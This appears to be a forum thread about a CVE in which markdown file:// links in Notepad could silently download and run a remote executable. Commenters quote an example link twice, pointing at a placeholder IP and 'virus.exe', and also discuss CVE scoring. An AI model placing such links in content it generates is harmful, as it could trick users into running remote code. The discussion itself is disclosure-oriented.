if you click a link to file:///123.45.67.89:69420/files-download/virus.exe it will download and run virus.exe from that IP address
it still works, but now there is a “Dangerous Link Location: This is not a web link and may lead to the execution of malicious code” warning, but previously it would silently run the file.
Yep it’s markdown, and yep they had a CVE with second highest grade cause of it
Aren’t CVE grades meaningless anyway with how they are declared in real world?
We run CVEs through our software inventory and configuration and come up with a new score that measures how bad it is for us.
https://www.cve.org/CVERecord?id=CVE-2026-20841
Neat
heh, ofc. Apparently something to do with file:// and such uri handling, apparently executing local files? Yikes.
not just local files
if you click a link to file:///123.45.67.89:69420/files-download/virus.exe it will download and run virus.exe from that IP address
it still works, but now there is a “Dangerous Link Location: This is not a web link and may lead to the execution of malicious code” warning, but previously it would silently run the file.
kinda wild a file-link ever went straight to executing it after download - which on it’s own could be dangerous as well.
I guess the “the s in IOT stands for security” also applies to notepad: “the s in vibecoding stands for security”